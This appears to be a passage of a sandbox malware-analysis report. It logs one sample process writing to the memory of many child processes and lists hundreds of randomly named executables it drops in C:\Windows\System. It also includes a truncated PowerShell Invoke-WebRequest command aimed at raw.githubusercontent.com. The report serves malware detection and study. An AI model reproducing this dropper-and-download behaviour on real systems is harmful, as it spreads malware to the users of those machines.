PID 2948 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\irSRCkL.exe
PID 2948 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\irSRCkL.exe
PID 2948 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\irSRCkL.exe
PID 2948 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\kkKFWJp.exe
PID 2948 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\kkKFWJp.exe
PID 2948 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\kkKFWJp.exe
PID 2948 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TYvDrPt.exe
PID 2948 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TYvDrPt.exe
PID 2948 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TYvDrPt.exe
PID 2948 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\XdrViiL.exe
PID 2948 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\XdrViiL.exe
PID 2948 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\XdrViiL.exe
PID 2948 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\mchSqxr.exe
PID 2948 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\mchSqxr.exe
PID 2948 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\mchSqxr.exe
PID 2948 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rkFFehA.exe
PID 2948 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rkFFehA.exe
PID 2948 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rkFFehA.exe
PID 2948 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\NPLFdly.exe
PID 2948 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\NPLFdly.exe
PID 2948 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\NPLFdly.exe
PID 2948 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CuRUnIK.exe
PID 2948 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CuRUnIK.exe
PID 2948 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CuRUnIK.exe
PID 2948 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\VQnuaGj.exe
PID 2948 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\VQnuaGj.exe
PID 2948 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\VQnuaGj.exe
PID 2948 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TncckMg.exe
PID 2948 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TncckMg.exe
PID 2948 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\TncckMg.exe
PID 2948 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\BxJvwKu.exe
PID 2948 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\BxJvwKu.exe
PID 2948 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\BxJvwKu.exe
PID 2948 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\RMAwFgU.exe
PID 2948 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\RMAwFgU.exe
PID 2948 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\RMAwFgU.exe
PID 2948 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ebiekAd.exe
PID 2948 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ebiekAd.exe
PID 2948 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ebiekAd.exe
PID 2948 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\pGXFpyC.exe
PID 2948 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\pGXFpyC.exe
PID 2948 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\pGXFpyC.exe
PID 2948 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JfFVnfF.exe
PID 2948 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JfFVnfF.exe
PID 2948 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JfFVnfF.exe
PID 2948 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\aVFcnyx.exe
PID 2948 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\aVFcnyx.exe
PID 2948 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\aVFcnyx.exe
PID 2948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sqWcnnc.exe
PID 2948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sqWcnnc.exe
PID 2948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sqWcnnc.exe
PID 2948 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\dplevKF.exe
PID 2948 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\dplevKF.exe
PID 2948 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\dplevKF.exe
PID 2948 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OQkXzmm.exe
PID 2948 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OQkXzmm.exe
PID 2948 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OQkXzmm.exe
PID 2948 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ryQIKFq.exe
PID 2948 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ryQIKFq.exe
PID 2948 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ryQIKFq.exe
PID 2948 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\pADMXKh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\irSRCkL.exe

C:\Windows\System\irSRCkL.exe

C:\Windows\System\kkKFWJp.exe

C:\Windows\System\kkKFWJp.exe

C:\Windows\System\TYvDrPt.exe

C:\Windows\System\TYvDrPt.exe

C:\Windows\System\XdrViiL.exe

C:\Windows\System\XdrViiL.exe

C:\Windows\System\mchSqxr.exe

C:\Windows\System\mchSqxr.exe

C:\Windows\System\rkFFehA.exe

C:\Windows\System\rkFFehA.exe

C:\Windows\System\NPLFdly.exe

C:\Windows\System\NPLFdly.exe

C:\Windows\System\CuRUnIK.exe

C:\Windows\System\CuRUnIK.exe

C:\Windows\System\VQnuaGj.exe

C:\Windows\System\VQnuaGj.exe

C:\Windows\System\TncckMg.exe

C:\Windows\System\TncckMg.exe

C:\Windows\System\BxJvwKu.exe

C:\Windows\System\BxJvwKu.exe

C:\Windows\System\RMAwFgU.exe

C:\Windows\System\RMAwFgU.exe

C:\Windows\System\ebiekAd.exe

C:\Windows\System\ebiekAd.exe

C:\Windows\System\pGXFpyC.exe

C:\Windows\System\pGXFpyC.exe

C:\Windows\System\JfFVnfF.exe

C:\Windows\System\JfFVnfF.exe

C:\Windows\System\aVFcnyx.exe

C:\Windows\System\aVFcnyx.exe

C:\Windows\System\sqWcnnc.exe

C:\Windows\System\sqWcnnc.exe

C:\Windows\System\dplevKF.exe

C:\Windows\System\dplevKF.exe

C:\Windows\System\OQkXzmm.exe

C:\Windows\System\OQkXzmm.exe

C:\Windows\System\ryQIKFq.exe

C:\Windows\System\ryQIKFq.exe

C:\Windows\System\pADMXKh.exe

C:\Windows\System\pADMXKh.exe

C:\Windows\System\sbwTaeW.exe

C:\Windows\System\sbwTaeW.exe

C:\Windows\System\majNrhl.exe

C:\Windows\System\majNrhl.exe

C:\Windows\System\eeZfpMp.exe

C:\Windows\System\eeZfpMp.exe

C:\Windows\System\bxkijDZ.exe

C:\Windows\System\bxkijDZ.exe

C:\Windows\System\JnwJCYH.exe

C:\Windows\System\JnwJCYH.exe

C:\Windows\System\WxGwdfq.exe

C:\Windows\System\WxGwdfq.exe

C:\Windows\System\liODnOH.exe

C:\Windows\System\liODnOH.exe

C:\Windows\System\kuuepro.exe

C:\Windows\System\kuuepro.exe

C:\Windows\System\xhXLLut.exe

C:\Windows\System\xhXLLut.exe

C:\Windows\System\Gxsseuv.exe

C:\Windows\System\Gxsseuv.exe

C:\Windows\System\PIhcqMP.exe

C:\Windows\System\PIhcqMP.exe

C:\Windows\System\LnEgeUm.exe

C:\Windows\System\LnEgeUm.exe

C:\Windows\System\ZmoKKfH.exe

C:\Windows\System\ZmoKKfH.exe

C:\Windows\System\oTLUaYN.exe

C:\Windows\System\oTLUaYN.exe

C:\Windows\System\bHGOUeO.exe

C:\Windows\System\bHGOUeO.exe

C:\Windows\System\ahtQkPX.exe

C:\Windows\System\ahtQkPX.exe

C:\Windows\System\mDcJPag.exe

C:\Windows\System\mDcJPag.exe

C:\Windows\System\aCcPrkz.exe

C:\Windows\System\aCcPrkz.exe

C:\Windows\System\wrqmKYz.exe

C:\Windows\System\wrqmKYz.exe

C:\Windows\System\HsOYbyu.exe

C:\Windows\System\HsOYbyu.exe

C:\Windows\System\aUbeICP.exe

C:\Windows\System\aUbeICP.exe

C:\Windows\System\nhTXWCw.exe

C:\Windows\System\nhTXWCw.exe

C:\Windows\System\zPNvpZe.exe

C:\Windows\System\zPNvpZe.exe

C:\Windows\System\rnRCeLL.exe

C:\Windows\System\rnRCeLL.exe

C:\Windows\System\WRAfFid.exe

C:\Windows\System\WRAfFid.exe

C:\Windows\System\OAcwhTd.exe

C:\Windows\System\OAcwhTd.exe

C:\Windows\System\SsviGFt.exe

C:\Windows\System\SsviGFt.exe

C:\Windows\System\qzksbyc.exe

C:\Windows\System\qzksbyc.exe

C:\Windows\System\vqUufeT.exe

C:\Windows\System\vqUufeT.exe

C:\Windows\System\dknIswX.exe

C:\Windows\System\dknIswX.exe

C:\Windows\System\tRfMKio.exe

C:\Windows\System\tRfMKio.exe

C:\Windows\System\eUvdTbq.exe

C:\Windows\System\eUvdTbq.exe

C:\Windows\System\zaScrLw.exe

C:\Windows\System\zaScrLw.exe

C:\Windows\System\JdWkcQK.exe

C:\Windows\System\JdWkcQK.exe

C:\Windows\System\MaMoEyW.exe

C:\Windows\System\MaMoEyW.exe

C:\Windows\System\XMXEloq.exe

C:\Windows\System\XMXEloq.exe

C:\Windows\System\ByCEPcn.exe

C:\Windows\System\ByCEPcn.exe

C:\Windows\System\ZSvNwUh.exe

C:\Windows\System\ZSvNwUh.exe

C:\Windows\System\nDHXLJE.exe

C:\Windows\System\nDHXLJE.exe

C:\Windows\System\amzQjxW.exe

C:\Windows\System\amzQjxW.exe

C:\Windows\System\QweITiU.exe

C:\Windows\System\QweITiU.exe

C:\Windows\System\jyPJZSa.exe

C:\Windows\System\jyPJZSa.exe

C:\Windows\System\dyVhjhJ.exe

C:\Windows\System\dyVhjhJ.exe

C:\Windows\System\KRPmLNE.exe

C:\Windows\System\KRPmLNE.exe

C:\Windows\System\cTDSIWT.exe

C:\Windows\System\cTDSIWT.exe

C:\Windows\System\CiDkbpS.exe

C:\Windows\System\CiDkbpS.exe

C:\Windows\System\dLZLIae.exe

C:\Windows\System\dLZLIae.exe

C:\Windows\System\qRBkeLT.exe

C:\Windows\System\qRBkeLT.exe

C:\Windows\System\VXXgOvd.exe

C:\Windows\System\VXXgOvd.exe

C:\Windows\System\vdIDGyA.exe

C:\Windows\System\vdIDGyA.exe

C:\Windows\System\aWhxIgG.exe

C:\Windows\System\aWhxIgG.exe

C:\Windows\System\AHNTDDY.exe

C:\Windows\System\AHNTDDY.exe

C:\Windows\System\kGJDKMc.exe

C:\Windows\System\kGJDKMc.exe

C:\Windows\System\qvOBBjW.exe

C:\Windows\System\qvOBBjW.exe

C:\Windows\System\wWNiNBN.exe

C:\Windows\System\wWNiNBN.exe

C:\Windows\System\GKdodIr.exe

C:\Windows\System\GKdodIr.exe

C:\Windows\System\NdJrsDR.exe

C:\Windows\System\NdJrsDR.exe

C:\Windows\System\RAFkDWM.exe

C:\Windows\System\RAFkDWM.exe

C:\Windows\System\pLNkwMD.exe

C:\Windows\System\pLNkwMD.exe

C:\Windows\System\uicSKse.exe

C:\Windows\System\uicSKse.exe

C:\Windows\System\YxvyYHd.exe

C:\Windows\System\YxvyYHd.exe

C:\Windows\System\StkVQaD.exe

C:\Windows\System\StkVQaD.exe

C:\Windows\System\BrpZtYR.exe

C:\Windows\System\BrpZtYR.exe

C:\Windows\System\eBkcqry.exe

C:\Windows\System\eBkcqry.exe

C:\Windows\System\oIvSJJM.exe

C:\Windows\System\oIvSJJM.exe

C:\Windows\System\nPfkoHu.exe

C:\Windows\System\nPfkoHu.exe

C:\Windows\System\IXnTprw.exe

C:\Windows\System\IXnTprw.exe

C:\Windows\System\uAEtcxQ.exe

C:\Windows\System\uAEtcxQ.exe

C:\Windows\System\VXnjJBm.exe

C:\Windows\System\VXnjJBm.exe

C:\Windows\System\vIRSGoq.exe

C:\Windows\System\vIRSGoq.exe

C:\Windows\System\DroHuAe.exe

C:\Windows\System\DroHuAe.exe

C:\Windows\System\bvHHJjI.exe

C:\Windows\System\bvHHJjI.exe

C:\Windows\System\cnTfeNL.exe

C:\Windows\System\cnTfeNL.exe

C:\Windows\System\MciZMlt.exe

C:\Windows\System\MciZMlt.exe

C:\Windows\System\QWVCRHT.exe

C:\Windows\System\QWVCRHT.exe

C:\Windows\System\JUlFupo.exe

C:\Windows\System\JUlFupo.exe

C:\Windows\System\IATLYgM.exe

C:\Windows\System\IATLYgM.exe

C:\Windows\System\adQqVTY.exe

C:\Windows\System\adQqVTY.exe

C:\Windows\System\bfgUdez.exe

C:\Windows\System\bfgUdez.exe

C:\Windows\System\uzwsWkz.exe

C:\Windows\System\uzwsWkz.exe

C:\Windows\System\BICLfje.exe

C:\Windows\System\BICLfje.exe

C:\Windows\System\wEHRVqw.exe

C:\Windows\System\wEHRVqw.exe

C:\Windows\System\XHgUnZK.exe

C:\Windows\System\XHgUnZK.exe

C:\Windows\System\GbyHRIe.exe

C:\Windows\System\GbyHRIe.exe

C:\Windows\System\TNjCURn.exe

C:\Windows\System\TNjCURn.exe

C:\Windows\System\VAbvBxY.exe

C:\Windows\System\VAbvBxY.exe

C:\Windows\System\ypwyhDu.exe

C:\Windows\System\ypwyhDu.exe

C:\Windows\System\CmWQvnv.exe

C:\Windows\System\CmWQvnv.exe

C:\Windows\System\asUiaMf.exe

C:\Windows\System\asUiaMf.exe

C:\Windows\System\TrsrQFa.exe

C:\Windows\System\TrsrQFa.exe

C:\Windows\System\yHyBZdf.exe

C:\Windows\System\yHyBZdf.exe

C:\Windows\System\FpOqtHc.exe

C:\Windows\System\FpOqtHc.exe

C:\Windows\System\wBEOoQi.exe

C:\Windows\System\wBEOoQi.exe

C:\Windows\System\rEUGEYe.exe

C:\Windows\System\rEUGEYe.exe

C:\Windows\System\wRcYnxl.exe

C:\Windows\System\wRcYnxl.exe

C:\Windows\System\UTSDoyn.exe

C:\Windows\System\UTSDoyn.exe

C:\Windows\System\smxDppX.exe

C:\Windows\System\smxDppX.exe

C:\Windows\System\CfoRmbC.exe

C:\Windows\System\CfoRmbC.exe

C:\Windows\System\NbzsInX.exe

C:\Windows\System\NbzsInX.exe

C:\Windows\System\kTFZHcJ.exe

C:\Windows\System\kTFZHcJ.exe

C:\Windows\System\RUAUzHK.exe

C:\Windows\System\RUAUzHK.exe

C:\Windows\System\uLelHMI.exe

C:\Windows\System\uLelHMI.exe

C:\Windows\System\JNkHLgW.exe

C:\Windows\System\JNkHLgW.exe

C:\Windows\System\cCGFvhB.exe

C:\Windows\System\cCGFvhB.exe

C:\Windows\System\LKAczKm.exe

C:\Windows\System\LKAczKm.exe

C:\Windows\System\iPFcJwQ.exe

C:\Windows\System\iPFcJwQ.exe

C:\Windows\System\XRFtDfg.exe

C:\Windows\System\XRFtDfg.exe

C:\Windows\System\twQeKoE.exe

C:\Windows\System\twQeKoE.exe

C:\Windows\System\GFLzGhJ.exe

C:\Windows\System\GFLzGhJ.exe

C:\Windows\System\bTlpasX.exe

C:\Windows\System\bTlpasX.exe

C:\Windows\System\GBjocyo.exe

C:\Windows\System\GBjocyo.exe

C:\Windows\System\flbanLb.exe

C:\Windows\System\flbanLb.exe

C:\Windows\System\mLlJdLo.exe

C:\Windows\System\mLlJdLo.exe

C:\Windows\System\VMxjNFU.exe

C:\Windows\System\VMxjNFU.exe

C:\Windows\System\LxBfFGQ.exe

C:\Windows\System\LxBfFGQ.exe

C:\Windows\System\LHsDGSH.exe

C:\Windows\System\LHsDGSH.exe

C:\Windows\System\BxTNkuB.exe

C:\Windows\System\BxTNkuB.exe

C:\Windows\System\RgZrmJr.exe

C:\Windows\System\RgZrmJr.exe

C:\Windows\System\DNyCOcg.exe

C:\Windows\System\DNyCOcg.exe

C:\Windows\System\ctziXNp.exe

C:\Windows\System\ctziXNp.exe

C:\Windows\System\pxkTqar.exe

C:\Windows\System\pxkTqar.exe

C:\Windows\System\NKumYHO.exe

C:\Windows\System\NKumYHO.exe

C:\Windows\System\GAAgkWm.exe

C:\Windows\System\GAAgkWm.exe

C:\Windows\System\HwLXIMo.exe

C:\Windows\System\HwLXIMo.exe

C:\Windows\System\kMkqsou.exe

C:\Windows\System\kMkqsou.exe

C:\Windows\System\MFmbYGk.exe

C:\Windows\System\MFmbYGk.exe

C:\Windows\System\LuOUBvn.exe

C:\Windows\System\LuOUBvn.exe

C:\Windows\System\NFWEIsD.exe

C:\Windows\System\NFWEIsD.exe

C:\Windows\System\HumMdWF.exe

C:\Windows\System\HumMdWF.exe

C:\Windows\System\PJOtisx.exe

C:\Windows\System\PJOtisx.exe

C:\Windows\System\czYIxED.exe

C:\Windows\System\czYIxED.exe

C:\Windows\System\zPtDSmO.exe

C:\Windows\System\zPtDSmO.exe

C:\Windows\System\GjReaHS.exe

C:\Windows\System\GjReaHS.exe

C:\Windows\System\lXvTzTN.exe

C:\Windows\System\lXvTzTN.exe

C:\Windows\System\txQkrlg.exe

C:\Windows\System\txQkrlg.exe

C:\Windows\System\nSncxrJ.exe

C:\Windows\System\nSncxrJ.exe

C:\Windows\System\LioUTPk.exe

C:\Windows\System\LioUTPk.exe

C:\Windows\System\ucIjcrk.exe

C:\Windows\System\ucIjcrk.exe

C:\Windows\System\ibwBnYm.exe

C:\Windows\System\ibwBnYm.exe

C:\Windows\System\aJLQEwN.exe

C:\Windows\System\aJLQEwN.exe

C:\Windows\System\JyfhKjQ.exe

C:\Windows\System\JyfhKjQ.exe

C:\Windows\System\ymPvQKT.exe

C:\Windows\System\ymPvQKT.exe

C:\Windows\System\noPHYuG.exe

C:\Windows\System\noPHYuG.exe

C:\Windows\System\FZBUEGY.exe

C:\Windows\System\FZBUEGY.exe

C:\Windows\System\YSITQcP.exe

C:\Windows\System\YSITQcP.exe

C:\Windows\System\CUXWRPI.exe

C:\Windows\System\CUXWRPI.exe

C:\Windows\System\beUVzTl.exe

C:\Windows\System\beUVzTl.exe

C:\Windows\System\NgrkBxV.exe

C:\Windows\System\NgrkBxV.exe

C:\Windows\System\upRHMOk.exe

C:\Windows\System\upRHMOk.exe

C:\Windows\System\cPGDgaR.exe

C:\Windows\System\cPGDgaR.exe

C:\Windows\System\cZTDbgV.exe

C:\Windows\System\cZTDbgV.exe

C:\Windows\System\rcOaQdo.exe

C:\Windows\System\rcOaQdo.exe

C:\Windows\System\mAFzwSh.exe

C:\Windows\System\mAFzwSh.exe

C:\Windows\System\JMKUMKJ.exe

C:\Windows\System\JMKUMKJ.exe

C:\Windows\System\AenrvqW.exe

C:\Windows\System\AenrvqW.exe

C:\Windows\System\sddpifK.exe

C:\Windows\System\sddpifK.exe

C:\Windows\System\rQHblGd.exe

C:\Windows\System\rQHblGd.exe

C:\Windows\System\wUXQkdu.exe

C:\Windows\System\wUXQkdu.exe

C:\Windows\System\AemumPo.exe

C:\Windows\System\AemumPo.exe

C:\Windows\System\MQENQeB.exe

C:\Windows\System\MQENQeB.exe

C:\Windows\System\JiVjJKi.exe

C:\Windows\System\JiVjJKi.exe

C:\Windows\System\vpiXRKN.exe

C:\Windows\System\vpiXRKN.exe

C:\Windows\System\sjJJsEJ.exe

C:\Windows\System\sjJJsEJ.exe

C:\Windows\System\yvRfWHO.exe

C:\Windows\System\yvRfWHO.exe

C:\Windows\System\bxRpnkC.exe

C:\Windows\System\bxRpnkC.exe

C:\Windows\System\RsndmZN.exe

C:\Windows\System\RsndmZN.exe

C:\Windows\System\bjhadnk.exe

C:\Windows\System\bjhadnk.exe

C:\Windows\System\PFfKvCI.exe

C:\Windows\System\PFfKvCI.exe

C:\Windows\System\SKLLIKq.exe

C:\Windows\System\SKLLIKq.exe

C:\Windows\System\mSfVTiF.exe

C:\Windows\System\mSfVTiF.exe

C:\Windows\System\irnlfGt.exe

C:\Windows\System\irnlfGt.exe

C:\Windows\System\kwHobTC.exe

C:\Windows\System\kwHobTC.exe

C:\Windows\System\iChkrcB.exe

C:\Windows\System\iChkrcB.exe

C:\Windows\System\aQuKkcF.exe

C:\Windows\System\aQuKkcF.exe

C:\Windows\System\ooyCNRd.exe

C:\Windows\System\ooyCNRd.exe

C:\Windows\System\TEsYrbI.exe

C:\Windows\System\TEsYrbI.exe

C:\Windows\System\nQkkpTK.exe

C:\Windows\System\nQkkpTK.exe

C:\Windows\System\iMTtOXv.exe

C:\Windows\System\iMTtOXv.exe

C:\Windows\System\SsnIxMW.exe

C:\Windows\System\SsnIxMW.exe

C:\Windows\System\dYMtXld.exe

C:\Windows\System\dYMtXld.exe

C:\Windows\System\xKtAyFN.exe

C:\Windows\System\xKtAyFN.exe

C:\Windows\System\RcjVeMg.exe

C:\Windows\System\RcjVeMg.exe

C:\Windows\System\uxsIBnW.exe

C:\Windows\System\uxsIBnW.exe

C:\Windows\System\rLgcfQB.exe

C:\Windows\System\rLgcfQB.exe

C:\Windows\System\QVTtEhg.exe

C:\Windows\System\QVTtEhg.exe

C:\Windows\System\kZrSfAv.exe

C:\Windows\System\kZrSfAv.exe

C:\Windows\System\cExhMJp.exe

C:\Windows\System\cExhMJp.exe

C:\Windows\System\MWqxfEo.exe

C:\Windows\System\MWqxfEo.exe

C:\Windows\System\GCobxHv.exe

C:\Windows\System\GCobxHv.exe

C:\Windows\System\jJvdAbK.exe

C:\Windows\System\jJvdAbK.exe

C:\Windows\System\kSYtbkI.exe

C:\Windows\System\kSYtbkI.exe

C:\Windows\System\xoksSvl.exe

C:\Windows\System\xoksSvl.exe

C:\Windows\System\uZuIMXN.exe

C:\Windows\System\uZuIMXN.exe

C:\Windows\System\MYndekr.exe

C:\Windows\System\MYndekr.exe

C:\Windows\System\BOclQij.exe

C:\Windows\System\BOclQij.exe

C:\Windows\System\tDbCKPO.exe

C:\Windows\System\tDbCKPO.exe

C:\Windows\System\BORRUGC.exe

C:\Windows\System\BORRUGC.exe

C:\Windows\System\cVAejGe.exe

C:\Windows\System\cVAejGe.exe

C:\Windows\System\PQYYFeh.exe

C:\Windows\System\PQYYFeh.exe

C:\Windows\System\dhSZptj.exe

C:\Windows\System\dhSZptj.exe

C:\Windows\System\Zepgxnz.exe

C:\Windows\System\Zepgxnz.exe

C:\Windows\System\zdKLFpr.exe

C:\Windows\System\zdKLFpr.exe

C:\Windows\System\mbKTBhL.exe

C:\Windows\System\mbKTBhL.exe

